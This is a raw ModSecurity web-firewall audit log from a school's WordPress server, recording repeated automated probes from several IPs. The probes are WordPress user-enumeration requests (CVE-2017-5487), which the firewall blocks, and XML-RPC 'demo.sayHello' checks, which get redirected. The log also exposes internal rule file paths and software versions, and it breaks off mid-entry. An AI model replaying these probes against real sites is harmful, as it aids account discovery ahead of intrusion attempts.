Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c00bc1d-Z-- --b944cf41-A-- [17/May/2025:08:44:37 +0700] aCfqBXyxdQCiyU1ENFcn0wAAABA 103.236.140.4 44368 103.236.140.4 8181 --b944cf41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b944cf41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b944cf41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446277627293 2867 (- - -) Stopwatch2: 1747446277627293 2867; combined=1289, p1=422, p2=835, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b944cf41-Z-- --4a9f7b30-A-- [17/May/2025:08:44:46 +0700] aCfqDnyxdQCiyU1ENFcn1AAAABE 103.236.140.4 44378 103.236.140.4 8181 --4a9f7b30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a9f7b30-C-- demo.sayHello --4a9f7b30-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a9f7b30-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446286385928 6254 (- - -) Stopwatch2: 1747446286385928 6254; combined=4831, p1=614, p2=3970, p3=41, p4=43, p5=97, sr=103, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a9f7b30-Z-- --1c8b0519-A-- [17/May/2025:08:44:49 +0700] aCfqEXyxdQCiyU1ENFcn1QAAAA4 103.236.140.4 44382 103.236.140.4 8181 --1c8b0519-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c8b0519-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c8b0519-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446289129600 1458 (- - -) Stopwatch2: 1747446289129600 1458; combined=686, p1=236, p2=430, p3=0, p4=0, p5=20, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c8b0519-Z-- --3957565d-A-- [17/May/2025:08:44:54 +0700] aCfqFnyxdQCiyU1ENFcn1gAAAA8 103.236.140.4 44386 103.236.140.4 8181 --3957565d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.78 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3957565d-C-- demo.sayHello --3957565d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3957565d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446294740435 6667 (- - -) Stopwatch2: 1747446294740435 6667; combined=4840, p1=623, p2=3975, p3=40, p4=43, p5=96, sr=82, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3957565d-Z-- --e6247f3e-A-- [17/May/2025:08:45:31 +0700] aCfqOwTOsBn9MSWb6WJuywAAAIo 103.236.140.4 44394 103.236.140.4 8181 --e6247f3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e6247f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6247f3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446331129526 3255 (- - -) Stopwatch2: 1747446331129526 3255; combined=1408, p1=483, p2=894, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6247f3e-Z-- --b164b95a-A-- [17/May/2025:08:45:38 +0700] aCfqQnyxdQCiyU1ENFcn2AAAABM 103.236.140.4 44402 103.236.140.4 8181 --b164b95a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b164b95a-C-- demo.sayHello --b164b95a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b164b95a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446338506789 5474 (- - -) Stopwatch2: 1747446338506789 5474; combined=3717, p1=486, p2=3041, p3=33, p4=35, p5=73, sr=56, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b164b95a-Z-- --f67c802b-A-- [17/May/2025:08:45:41 +0700] aCfqRRKi5m5upc8uMd6iQwAAANE 103.236.140.4 44416 103.236.140.4 8181 --f67c802b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f67c802b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f67c802b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446341201679 2941 (- - -) Stopwatch2: 1747446341201679 2941; combined=1261, p1=428, p2=805, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f67c802b-Z-- --ac44e876-A-- [17/May/2025:08:45:46 +0700] aCfqSnyxdQCiyU1ENFcn3wAAAAY 103.236.140.4 44424 103.236.140.4 8181 --ac44e876-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac44e876-C-- demo.sayHello --ac44e876-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac44e876-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446346346048 6222 (- - -) Stopwatch2: 1747446346346048 6222; combined=4520, p1=603, p2=3682, p3=36, p4=42, p5=94, sr=80, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac44e876-Z-- --46b4336f-A-- [17/May/2025:08:46:25 +0700] aCfqcXyxdQCiyU1ENFcn4gAAAAs 103.236.140.4 44432 103.236.140.4 8181 --46b4336f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --46b4336f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b4336f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446385934967 2650 (- - -) Stopwatch2: 1747446385934967 2650; combined=1497, p1=467, p2=994, p3=0, p4=0, p5=36, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46b4336f-Z-- --e8038a7c-A-- [17/May/2025:08:46:29 +0700] aCfqdXyxdQCiyU1ENFcn5AAAABA 103.236.140.4 44436 103.236.140.4 8181 --e8038a7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e8038a7c-C-- demo.sayHello --e8038a7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8038a7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446389823858 5646 (- - -) Stopwatch2: 1747446389823858 5646; combined=4120, p1=543, p2=3355, p3=31, p4=36, p5=92, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8038a7c-Z-- --c0b9b878-A-- [17/May/2025:08:46:42 +0700] aCfqgnyxdQCiyU1ENFcn5gAAABM 103.236.140.4 44440 103.236.140.4 8181 --c0b9b878-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0b9b878-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0b9b878-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446402365856 2739 (- - -) Stopwatch2: 1747446402365856 2739; combined=1096, p1=376, p2=695, p3=0, p4=0, p5=25, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0b9b878-Z-- --3c5f0076-A-- [17/May/2025:08:46:47 +0700] aCfqh3yxdQCiyU1ENFcn6AAAABY 103.236.140.4 44444 103.236.140.4 8181 --3c5f0076-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3c5f0076-C-- demo.sayHello --3c5f0076-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c5f0076-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446407525450 3419 (- - -) Stopwatch2: 1747446407525450 3419; combined=2613, p1=335, p2=2121, p3=18, p4=18, p5=70, sr=48, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c5f0076-Z-- --cf06c65b-A-- [17/May/2025:08:46:58 +0700] aCfqknyxdQCiyU1ENFcn7AAAAAM 103.236.140.4 44454 103.236.140.4 8181 --cf06c65b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cf06c65b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf06c65b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446418768030 2780 (- - -) Stopwatch2: 1747446418768030 2780; combined=1242, p1=437, p2=776, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf06c65b-Z-- --2f0c5118-A-- [17/May/2025:08:47:03 +0700] aCfql3yxdQCiyU1ENFcn7QAAAAQ 103.236.140.4 44458 103.236.140.4 8181 --2f0c5118-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2f0c5118-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f0c5118-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446423385258 2388 (- - -) Stopwatch2: 1747446423385258 2388; combined=1083, p1=381, p2=675, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f0c5118-Z-- --7286a470-A-- [17/May/2025:08:47:03 +0700] aCfqlxKi5m5upc8uMd6iRAAAANI 103.236.140.4 44460 103.236.140.4 8181 --7286a470-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7286a470-C-- demo.sayHello --7286a470-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7286a470-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446423946174 5661 (- - -) Stopwatch2: 1747446423946174 5661; combined=4280, p1=510, p2=3451, p3=124, p4=36, p5=94, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7286a470-Z-- --3f0b1a19-A-- [17/May/2025:08:47:13 +0700] aCfqoQTOsBn9MSWb6WJuzQAAAI8 103.236.140.4 44466 103.236.140.4 8181 --3f0b1a19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f0b1a19-C-- demo.sayHello --3f0b1a19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0b1a19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446433212111 5099 (- - -) Stopwatch2: 1747446433212111 5099; combined=3868, p1=477, p2=3183, p3=22, p4=27, p5=93, sr=68, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0b1a19-Z-- --557b995a-A-- [17/May/2025:08:47:51 +0700] aCfqxwTOsBn9MSWb6WJuzwAAAJM 103.236.140.4 44470 103.236.140.4 8181 --557b995a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --557b995a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --557b995a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] 